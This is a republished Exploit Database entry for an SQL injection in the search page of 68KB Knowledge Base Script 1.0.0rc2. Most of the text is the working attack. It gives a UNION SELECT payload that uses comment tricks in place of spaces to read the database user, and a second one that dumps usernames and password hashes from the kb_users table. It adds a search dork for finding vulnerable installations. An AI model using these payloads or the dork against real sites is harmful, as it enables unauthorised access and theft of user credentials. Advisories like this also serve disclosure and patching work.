68KB Knowledge Base Script 1.0.0rc2 – Search SQL Injection

Exploit Database
41 阅读

作者： Jelmer de Hen

日期： 2010-03-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11925/

Exploit Title: 68kb SQLI
Date: 2010-03-28
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
Version: v1.0.0rc2

Go to /search
and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#
Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/.
Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation:
search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#

Dork: "Powered by 68kb"

-Jelmer de Hen

last Exploits
68KB Knowledge Base Script 1.0.0rc2 – Search SQL Injection的更多信息

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi：
D-Link DSL-500B Gen 2 – Parental Control Configuration Panel Persistent Cross-Site Scripting：
Joomla! Component ContentMap 1.3.8 – ‘contentid’ SQL Injection：
AVE DOMINAplus 1.10.x – Credential Disclosure：
WordPress Plugin LB Mixed Slideshow – ‘upload.php’ Arbitrary File Upload：
Responsive Events & Movie Ticket Booking Script 3.2.1 – ‘findcity.php?q’ SQL Injection：
EggBlog 4.1.2 – Arbitrary File Upload：
XiVO – Cross-Site Request Forgery：